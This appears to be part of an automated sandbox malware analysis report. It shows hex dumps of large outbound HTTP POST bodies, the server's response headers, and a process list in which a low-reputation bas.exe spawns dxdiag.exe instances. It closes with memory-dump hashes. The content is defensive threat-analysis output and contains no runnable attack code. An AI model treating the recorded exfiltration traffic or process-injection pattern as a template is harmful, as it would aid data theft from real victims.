                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: 16 d2 33 be 33 fe 53 cd 2c 28 e2 a9 63 f3 03 c0 3d f7 93 d5 f5 93 d7 40 1f 0d ff 79 cc 5b 79 4c 34 3d 46 73 c7 f5 57 5f bd 2e fa 51 af b2 b3 13 c6 4a 5d 66 88 e2 78 46 fa f1 da c9 63 92 48 38 88 6f ec ca e5 63 ff 3c 0b 7d 9b 9e eb dc 64 7f 11 65 29 15 02 ee 53 ee 2f 3f 96 ce 72 7a a4 87 e3 13 53 3c c4 dd 2d 06 97 d0 0c 43 09 50 b2 db 64 4f e0 19 3c 3e e1 c2 d2 d0 3f f1 a2 a7 8a 22 f7 17 24 79 c0 70 a5 ee 8b f2 15 c1 1f 03 fd b9 f5 fa 43 3f ac 05 e9 c5 91 d2 c2 c2 b3 95 ae a1 26 bc a2 ef d1 84 a7 4d 70 43 f1 58 33 4e 69 dc 1e 04 7e d0 e0 4b 78 47 88 08 7b 61 a8 a4 c0 30 eb 8c f2 a2 ea b6 54 b0 72 8e ff f9 b4 8b b8 36 d4 63 7d 62 f6 de bd 3d 2d bf 79 a4 d7 30 0f df 5e bb ee ee 72 c3 e2 eb 28 e9 7b b5 db 0b 4b c3 85 fb 0e 05 88 6a 64 de 04 b8 69 bf b5 85 89
                                                                                                      Data Ascii: 33S,(c=@y[yL4=FsW_.QJ]fxFcH8oc<}de)S/?rzS<-CPdO<>?"$ypC?&MpCX3Ni~KxG{a0Tr6c}b=-y0^r({Kjdi
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: 90 8b 66 67 e2 e7 09 61 ae 5b 95 fd c5 c5 23 5b ae 29 e2 29 e2 af d4 66 9f 14 33 cb 95 ff dd 88 f4 e3 ca 73 72 68 0c eb 5f 1d b2 df 0c 3a c6 5b a8 b7 3c 50 a8 99 c3 58 fb fa dd 2a f6 10 9d 87 9a 8b 3e e5 e0 b8 ea 14 7e 68 63 c0 fd be e2 3d cd 45 27 f9 e4 a8 4f 1a 2f 5b 7e 62 6f de da 74 52 ea f9 d4 fb c6 48 9d 1e dc 97 01 c8 75 f0 5a 29 6a 72 eb e5 c6 bb 31 2d 34 cb 60 b6 93 33 70 4b 67 5d 40 22 2e ef 47 06 b7 2e fa 93 a2 f1 23 b8 be dd df 41 14 d4 fc 0c ee 3b fd 57 1d 87 3f c3 92 de 9b 2d 52 28 71 89 1d be d6 ae 69 af 01 8c 60 93 c3 c2 71 4f c2 0f 94 2d de a2 df e0 03 d0 9c c4 01 6b 62 2a 67 8f 32 e9 e4 dc a2 ea a6 41 35 83 79 61 44 26 e6 45 52 68 d4 a8 10 45 e8 44 6d cb 8a 81 fc 83 47 31 8d c1 35 c5 59 7f e9 ed c7 fc c5 77 b4 63 cf 44 e8 ab 89 89 fe 64
                                                                                                      Data Ascii: fga[#[))f3srh_:[<PX*>~hc=E'O/[~botRHuZ)jr1-4`3pKg]@".G.#A;W?-R(qi`qO-kb*g2A5yaD&ERhEDmG15YwcDd
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: 16 9e 3c 4f b7 12 ba 25 95 53 a3 1f a3 15 93 58 45 bf 70 72 1a fc f0 87 de 9a 62 95 42 62 11 7f c1 c1 e5 ff 1a fd 10 50 78 97 bf 30 0f 73 01 03 b6 d0 c0 c0 07 9a 37 47 c8 32 a7 18 21 d2 ad aa cf 20 a9 1e af 97 be 55 87 90 79 d0 70 04 45 3f 3a f7 83 7e 36 85 d1 10 de 27 8a 1f 79 eb 6b ac cf f1 56 eb aa e0 e0 57 74 0d 6c 5f 7c ee 98 93 bc 2a 2e 88 90 79 fc d0 c4 39 d8 03 df 28 31 94 9c 2b 84 70 59 13 a7 b1 2c 60 9b 21 bd 74 66 28 bb 18 f0 02 69 c6 2b 31 1e 11 f0 1e 7f f4 45 f5 f6 4a ba 03 d5 44 c6 e4 24 7f 39 78 96 5d 70 19 0d f3 09 a8 83 97 b9 36 13 d0 29 3e ec da 93 1f 55 a9 a3 c8 1c 6c 5e 2c fe e9 86 a8 3d e3 58 6a 8a 38 de 5f 3b b3 82 b3 0f 1b 59 22 ef 00 65 fa 80 12 2f d1 37 6d 42 f7 49 35 c6 c0 90 4e eb f6 cc fb d1 c4 55 de f7 b2 d6 a6 37 c2 e7 42 4a
                                                                                                      Data Ascii: <O%SXEprbBbPx0s7G2! UypE?:~6'ykVWtl_|*.y9(1+pY,`!tf(i+1EJD$9x]p6)>Ul^,=Xj8_;Y"e/7mBI5NU7BJ
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: 60 7b 8e 5e 6a 33 9e b9 31 29 79 41 5c df 77 c5 d5 eb 20 d5 6b 56 49 2e 22 50 e8 30 a9 d9 31 8c 3c 92 5d 68 33 32 af b8 5f b4 ba ca f2 6b a7 b1 ff 45 ed 49 a3 45 77 af 9e 06 a3 57 98 68 d0 5c c4 99 fc 75 b0 ce f5 a6 24 4b 44 b8 f2 4c 92 bb 5a 0c e9 c6 a8 20 a5 06 3e c3 7a 10 71 53 6c 03 cb 6e fd 45 4f c6 8e 47 a4 17 80 31 83 4d 7d b9 66 3d de f7 72 cb b8 c0 d3 a4 9e a8 10 cb 73 b7 1c 77 dd 28 60 d9 ba 65 98 57 19 ef 52 3a 47 93 5c 88 a1 a6 32 97 4f c6 59 59 29 65 28 f7 c5 66 88 89 c5 cb 7c 59 fd 59 9f c3 e4 e5 ff 41 3a 4f bb 39 8b b9 2f 3b a9 b7 b9 ef 1c 6b 2b 43 e8 93 9c d6 12 78 12 d7 66 00 9f 65 bb a9 32 4a 25 9f 29 24 a9 0b f0 d5 84 fd 62 35 fc 23 52 65 e2 84 ab ca ef 26 78 0b 1c f2 e6 74 9a 3a 25 4a 3d 5b 95 42 d1 ff 65 ce b5 06 16 73 ec d6 23 de 5b
                                                                                                      Data Ascii: `{^j31)yA\w kVI."P01<]h32_kEIEwWh\u$KDLZ >zqSlnEOG1M}f=rsw(`eWR:G\2OYY)e(f|YYA:O9/;k+Cxfe2J%)$b5#Re&xt:%J=[Bes#[
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: 3f bc 64 6a 4e 31 5a 44 e0 87 b9 3f 4a 53 bb 4d 06 fe ea 21 e0 f7 29 35 10 88 2d fd f2 cc bb 33 ef ba 9a 7a 99 7d ea cc 60 e6 35 ea 1d a1 0a e0 ef 87 ee 3e 4d 35 ff 4a 04 bf cb 7d 97 1e 3d a6 ce be 95 d3 de bf 8b 08 9a 0d c1 da 3d 19 78 12 67 8f 27 cd f9 6c 68 c9 c1 16 8b 9b e6 e9 b6 1e 5c 9d bd d9 d7 a8 91 15 a4 c6 d6 33 11 1f 27 2f 6f 68 9d a3 47 c3 b2 58 1c db 62 43 8b 44 3d c1 6a b9 ce 69 69 cf bc 4a 4e d9 90 ba 0e 1d 4c 88 72 f7 7d ba 6d ce 23 99 18 55 b5 cd c1 c0 cd 67 b8 5a 23 d9 af c9 23 b9 f2 8c 24 ec e9 a4 3d 52 26 bb eb f4 13 24 b4 43 f3 83 00 13 36 f2 28 9e 11 80 ba 22 83 cf a0 0a 10 2e 39 d1 67 a6 c9 e1 6f 74 ed 9c e0 79 5d 84 9f 0b d8 41 2f 25 61 bf 5c 09 13 a4 1c 1a 52 50 4e 2b e5 fa 1d be 27 75 62 dc c3 03 94 fe 23 f2 6f c6 ab 7c f4 bc a0
                                                                                                      Data Ascii: ?djN1ZD?JSM!)5-3z}`5>M5J}==xg'lh\3'/ohGXbCD=jiiJNLr}m#UgZ##$=R&$C6(".9goty]A/%a\RPN+'ub#o|
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: e2 aa 43 7b 08 2e 0a 91 99 fd 97 81 4d a5 d3 39 bd 7c e6 bb 0d f7 20 fc 3e 97 71 18 3d 0b 8d ea 7f 29 d7 07 82 f1 38 20 0f 3c c0 be a6 cd 17 6a 4f 92 ac 0a 4d 79 6d 4a f6 6d 00 c8 c1 fd ef 03 ce 83 1c de 39 63 27 41 b2 ef c3 54 b4 f6 58 60 9f df 0d 8f e1 12 a8 42 2f bf 5e 0d 22 97 ce fd 5a ef cb 8b 4d 4a b6 c5 05 a0 fb db 5c d6 c7 70 59 71 1b 6d a2 eb 99 bc f9 85 ba 8b ba 77 25 98 32 c0 61 c5 f0 9f 00 4e 14 c3 db ac 19 c9 38 73 62 ec 09 cf 70 c9 a2 e5 80 0e 5c 95 65 b3 bc e8 ab 8f 79 ce 79 c0 ee 8e ec 2d be 9d 10 41 69 18 62 fd 3b 87 5b 6d b8 e4 3a 0b 81 06 16 cc 0c 47 3a 65 de be 1b ed 26 3e 5f b4 bb bc ad 2d a5 7c 2f 77 7d 63 8e d7 ad 56 c5 09 a1 d8 7e 2f d2 67 c8 38 46 b1 ee 65 6b 40 20 6a 99 d5 e3 25 9c 26 16 3a f1 f8 f7 5f bf 12 b5 66 21 0b 57 59 6a
                                                                                                      Data Ascii: C{.M9| >q=)8 <jOMymJm9c'ATX`B/^"ZMJ\pYqmw%2aN8sbp\eyy-Aib;[m:G:e&>_-|/w}cV~/g8Fek@ j%&:_f!WYj
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: 89 c8 84 00 e5 45 f9 cd e1 7a 6e a2 0e 83 58 c1 66 4a a2 98 2d ab d5 bd 95 bc 71 91 77 0b 6e f1 71 e6 70 e2 ec 00 76 16 52 45 c8 a8 1e b9 19 ba 8f ac 42 72 6b b7 f5 14 2b 7c fc f7 df f4 3a 74 fe 57 97 23 54 69 ec fe d9 57 f3 5a 68 f0 7e da 9c 0f 90 b3 0d b8 a7 29 28 c4 da b3 df e0 ca b6 0c 1f 7a 20 fa bc ad e7 1c 5b 47 ca 5b 0f 24 dc a7 a5 f9 71 45 03 c0 e6 1e 06 73 ad 3e 92 c8 20 32 4c 34 d7 19 12 be 24 05 d1 4b 81 5d 86 a8 90 0a 63 04 31 1e 16 42 94 64 f9 ae dc 72 3d 42 0b 9b 2d 0a a9 d1 6c 5d 53 c3 be 2b 01 dd ab 5e 59 d1 0e 48 f0 34 20 ed 8d 5b 8d 4d a7 bf b2 87 c0 a7 3d a6 ae db 24 49 d9 75 26 e8 d8 9f 2b 79 9a 75 ca 02 37 7a 53 db 6d 9c a3 57 9b d7 61 4f 91 c6 69 86 3c 38 e9 b9 ba 7d 7c e4 7d 0c 69 8a 9b 14 61 7e 1f e3 44 2d 95 70 70 a7 7b a3 1a 95
                                                                                                      Data Ascii: EznXfJ-qwnqpvREBrk+|:tW#TiWZh~)(z [G[$qEs> 2L4$K]c1Bdr=B-l]S+^YH4 [M=$Iu&+yu7zSmWaOi<8}|}ia~D-pp{
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: ee d5 1c c3 bb 41 e0 9e b6 91 9e 46 82 6f ce a7 59 69 7c e5 45 6d fc 5e 25 e3 cf 1d d5 68 19 28 e9 b3 93 07 6c 7e 47 4e 3e 12 13 19 bc f9 d7 3c 7f 78 cf c3 fa 84 88 75 21 2b a4 5b 7d ab e3 6c 36 cc 96 64 09 a3 80 fc af d1 fc 1b d6 ce 2c 83 a3 57 58 22 e0 e9 0e e7 5f c9 17 8f e4 38 0b 33 32 6d e9 66 c6 9b 78 b6 38 ca aa ca 95 5f d7 29 d5 42 7a 79 4b db c8 9e a2 da 13 8a 0f 05 1b 4f 90 1e 6a 93 ca 35 aa 10 e4 ad f8 da fd d1 53 5d 9b 11 ba ba e0 93 e8 b1 c7 ff 7d 4c 96 8c 25 f2 94 15 13 35 c5 1b 14 e9 0d 65 2b 45 cb df b1 32 73 9e 15 d5 17 7e 78 87 d7 cf 64 2e b0 37 b8 f6 31 9f 0c 46 c3 e6 5a ca c3 89 5e 7f 33 37 46 4b d8 c1 81 a3 be 73 94 01 8b 3f 6b 9b 5c a7 7c 8b 5d 26 1d 14 56 36 16 9f 20 c6 5c 23 e0 62 0e 25 bc 1e 37 3f fe 3e b1 80 f3 8b ed c3 5d 72 fe
                                                                                                      Data Ascii: AFoYi|Em^%h(l~GN><xu!+[}l6d,WX"_832mfx8_)BzyKOj5S]}L%5e+E2s~xd.71FZ^37FKs?k\|]&V6 \#b%7?>]r
                                                                                                      2024-12-23 00:22:26 UTC1135INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 00:22:26 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=714098cpj3nbn3io0hce7tdnbe; expires=Thu, 17 Apr 2025 18:09:04 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C19hEepDDQ6AYG%2BMZgGor1yMcdbrubVWC7SedLWFNgAOfXrimZrVmdT34OTZKFogp4FDfWdoPDXSfa3pZ0ig4vKnFPpEgHXmJvmaj8femhBiCZVnr38s%2F%2FD27nYNGmcvtXiX08k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6432700ba543fd-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1586&rtt_var=611&sent=328&recv=590&lost=0&retrans=0&sent_bytes=2844&recv_bytes=574060&delivery_rate=1768625&cwnd=217&unsent_bytes=0&cid=596c55945f25a127&ts=2491&x=0"


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:19:22:02
                                                                                                      Start date:22/12/2024
                                                                                                      Path:C:\Users\user\Desktop\bas.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\bas.exe"
                                                                                                      Imagebase:0x7ff64f040000
                                                                                                      File size:13'164'032 bytes
                                                                                                      MD5 hash:D5139AE53CB10A64C9245BBF3447ED1C
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:19:22:06
                                                                                                      Start date:22/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                                      Imagebase:0x70000
                                                                                                      File size:222'720 bytes
                                                                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:19:22:06
                                                                                                      Start date:22/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                                      Imagebase:0x70000
                                                                                                      File size:222'720 bytes
                                                                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Reset < >
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1430871252.00007FF64F041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64F040000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1430855714.00007FF64F040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1430935895.00007FF64F0EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1430935895.00007FF64FAEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1431872158.00007FF64FB36000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1432466618.00007FF64FC7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1432504273.00007FF64FC80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1432799955.00007FF64FC87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff64f040000_bas.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2933794660-0
                                                                                                        • Opcode ID: f9ae2fb9a0de7c00eebef5890eae5164fb69748a2e286ccafbd989ce6f655012
                                                                                                        • Instruction ID: 2e4fe1e20b51f4cdb00143040de4c35e8b1a423e2ca65b2c72c69260a7684fc5
                                                                                                        • Opcode Fuzzy Hash: f9ae2fb9a0de7c00eebef5890eae5164fb69748a2e286ccafbd989ce6f655012
                                                                                                        • Instruction Fuzzy Hash: 13112E22B58F028AEB00FF60E8542B933B4FB5A758F440E35EA6D87BA4DF78D1548340
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000003.1621063252.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, Offset: 02CF9000, based on PE: false
                                                                                                        • Associated: 00000003.00000003.1558296148.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_3_2cf9000_dxdiag.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                        • Instruction ID: 86aa08e8b6cd5b55d2fb9ed8a050a7ee81e4e2b269b4165451cd4558455d3d98
                                                                                                        • Opcode Fuzzy Hash: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                        • Instruction Fuzzy Hash: EB21F2661092D58FD307CF74D594A82BFA2FF8B71A39E40DCC9C18F527C2A56942CB52